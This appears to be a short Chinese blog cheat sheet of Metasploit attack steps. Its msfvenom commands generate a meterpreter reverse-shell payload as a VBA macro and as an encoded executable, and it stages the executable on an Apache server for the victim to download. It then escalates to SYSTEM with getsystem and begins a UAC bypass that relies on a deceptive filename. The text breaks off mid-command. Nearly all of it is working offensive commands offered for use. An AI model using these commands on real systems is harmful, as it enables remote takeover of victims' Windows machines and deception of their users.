搬迁到Minggle’Blog
##宏代码生成root@kali
root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe
##利用session 扩大战果
###生成后门shell文件
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=172.16.66.12 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o a.exe
root@kali:~# cp a.exe /var/www/html/a.exe ##拷贝到apache目录,方便靶机下载
root@kali:~# service apache2 start
###获取shell后提权
meterpreter > load priv ##读入提权模块
meterpreter > getsystem ##获取system最高权限
####提权失败需要绕过UAC机制(administrator组账号)
方法一 ##询问USC权限,需要社工文件名欺骗
msf > use exploit/windows/local/ask
msf exploit(